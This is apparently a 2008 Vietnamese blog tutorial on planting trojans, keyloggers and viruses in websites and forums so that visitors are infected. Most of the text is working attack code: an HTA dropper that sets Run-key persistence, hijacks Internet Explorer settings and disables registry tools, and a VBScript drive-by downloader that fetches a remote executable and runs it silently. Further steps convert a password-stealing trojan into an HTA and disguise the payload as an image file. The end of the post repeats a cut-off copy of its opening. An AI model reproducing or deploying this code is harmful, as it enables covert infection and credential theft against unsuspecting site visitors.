Gắn trojan ,keylog ,virus vào website, forum Posted on May 6, 2008 by roseandgun Cách 1 : Cách đính kèm trojan vào website Một số cách phổ biến đính kèm trojon vào website như dùng mã javascript hay dùng phần mềm Xin giới thiệu với các bạn 1 số cách a,Dùng 1 đoạn mã javascript để mở và phát tán trojan <script language=javascript> open(”địa chỉ con trojan”); </SCRIPT> Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở ra và yêu cầu người lướt website mở ra b, bạn copy vào notepad đoạn mã sau: Code: <html> <head> <script language=”javascript”> try { var fso = new ActiveXObject(”Scripting.FileSystemObject”); var Shell = new ActiveXObject(”WScript.Shell”); var tfolder2 = fso.GetSpecialFolder(0); var filepath2 = tfolder2 + “\\system32\\System.js”; var a2 = fso.CreateTextFile(filepath2, true); a2.WriteLine(’var url = “Địa chỉ trojon”;’); a2.WriteLine(’var burl = “Địa chỉ trojon”;’); a2.WriteLine(’var fso = new ActiveXObject(”Scripting.FileSystemObject”);’); a2.WriteLine(’var tfolder = fso.GetSpecialFolder(0);’); a2.WriteLine(’var filepath = tfolder + “\\\\system32\\\\System.js”;’); a2.WriteLine(’var Shell = new ActiveXObject(”WScript.Shell”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\ \\\Windows”,filepath);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\S ystem32″,filepath);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Main\\\\Start Page”,url);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″,url);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Dia chi con trojan”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Internet Explorer\\\\TypedURLs\\\\url1″);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Yahoo\\\\Pager\\\\View\\\\Địa chỉ trojon”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\Domains\\\\Địa chỉ trojon\\\\*”,4,”REG_DWORD”);’); a2.WriteLine(’Shell.RegWrite(”HKCU\\\\Software\\\\ Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies \\\\System\\\\DisableRegistryTools”,1,”REG_DWORD”) ;’); a2.Close(); Shell.Run(filepath2); } catch (e){} </script> <HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ /> </head> <body onload=’window.close()’> </body> </html> rồi save lại với tên là : trojan.hta bạn gắn đoạn mã sau vào cuối cùng của website của bạn: Code: <center> <span data <xml id=”oRun”> <preview> <view> <![CDATA[ <object id="oFile" data="trojan.hta?id=1"></object> ]]> </view> </preview> </xml> </center> </body> </html> rồi sau đó bạn upload file trojan.hta với website của bạn lên cùng 1 mỗi lần mở website của bạn con trojan sẽ tự open vào trong hệ thống mà không hề bị phát hiện Cách 2: đoạn đầu đưa vào diễn đàn là 01 frame <iframe width=”0″ height=”0″ đoạn 2 Code: <script language=”VBScript”> on error resume next dl = “Đường dẫn con Virus dạng .exe” Set df = document.createElement(”object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,”") a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,”") S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(”Scripting.FileSystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(”Shell.Application”,”") Q.ShellExecute fname1,”",”",”open”,0 </script> Cách 3 : Đầu tiên , mọi người hãy Download Program http://mail.packetstormsecurity.org/trojans/exe2vbs.zip Đây là chương trình giúp bạn Convert sang “*.hta Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS => để lấy pass của người Victim truy cập ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng Code: <script language=vbs> vào trên cùng Xuống dưới cùng thay dòng: WScript.CreateObject(”WScript.Shell”).run(pth) bằng Code: Set Shell1 = CreateObject(”WScript.Shell”) Shell1.Run(pth) </script> <HTA:APPLICATION WINDOWSTATE=’minimize’ SHOWINTASKBAR=’no’ /> </head> <body onload=’window.close()’> </body> </html> Sau đó save lại thành file trojan.hta Sau đó mở file web của bạn cho Victim truy cập ra thêm code này vào để run file trojan.hta Code: <center> <span data id=”oRun”> <preview> <view> <![CDATA[ <object id="oFile" data="trojan.hta? id=1"></object> ]]> </view> </preview> </xml> </center> </body> </html> để tên File có dạng File ảnh (JPG , GIF ,BMP …) : Theo cách 2 , mở Notepad : Code: <script language=”VBScript”> on error resume next dl = “Đường dẫn con Virus dạng .exe” Set df = document.createElement(”object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,”") a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,”") S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(”Scripting.FileSystemObject”,”") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close set Q = df.createobject(”Shell.Application”,”") Q.ShellExecute fname1,”",”",”open”,0 </script> Save lại dưới dạng “tên File.JPG” hay . GIF tùy ý . Ví dụ : funy.JPG Mở File funy.JPG vừa Save song bằng Font Page , nhấp chọn Instert Picture rồi cho bừa 1 bức ảnh để đỡ nghi ngờ . File - Save , Upload File funy.JPG vừa rồi lên . Giờ thì nó trông như 1 bức ảnh thật , có khi họ còn không nghi ngờ là có trojan trong đó nữa . . Gắn trojan ,keylog ,virus vào website, forum Posted on May 6, 2008 by roseandgun Cách 1 : Cách đính kèm trojan vào website Một số cách phổ biến đính kèm trojon vào website như. mở và phát tán trojan <script language=javascript> open(”địa chỉ con trojan ); </SCRIPT> Đoạn mã trên bạn chèn vào thẻ body của 1 trang website,khi nạn nhân mở website trojan sẽ mở. onload=’window.close()’> </body> </html> rồi save lại với tên là : trojan. hta bạn gắn đoạn mã sau vào cuối cùng của website của bạn: Code: <center> <span data <xml id=”oRun”> <preview> <view> <![CDATA[ <object